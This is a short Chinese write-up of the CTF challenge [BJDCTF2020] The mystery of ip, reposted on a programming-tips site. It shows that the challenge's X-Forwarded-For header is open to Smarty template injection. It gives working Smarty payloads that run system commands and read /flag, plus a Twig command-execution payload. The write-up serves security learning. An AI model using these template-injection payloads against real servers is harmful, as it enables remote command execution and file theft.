本文主要是介绍[BJDCTF2020]The mystery of ip，对大家解决编程问题具有一定的参考价值，需要的程序猿们随着小编来一起学习吧！

[BJDCTF2020]The mystery of ip Write-Up

知识点

• Smarty模板注入

• 能区分那个模板和其注入语法

题解

• 看见hint，抓包试一下，一般的ip都是通过请求头的cilent-ip、X-Forwarded-For等传过去的

• 发现没有这个请求头，自己加一个XFF写值看看是不是？发现变化

  

• 刚开始以为是sql注入，试了一下，貌似不对，可能是模板注入。记下下面这张图。用来区分那个模板，模板注入的语法非常多的。

  

• 经过测试，发现是Smarty模板

  

• {{system('ls /')}}

  

• {system("cat /flag")}

  {if readfile('/flag')}{/if}

总结

• 以前还做过Twig模板注入， 总结一下这两个的语法

• Twig：

  {{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("id")}}
  

• Smarty:

  {if php语句}{/if}

  {if readfile('文件路径')}{/if}

这篇关于[BJDCTF2020]The mystery of ip的文章就介绍到这儿，希望我们推荐的文章对大家有所帮助，也希望大家多多支持为之网！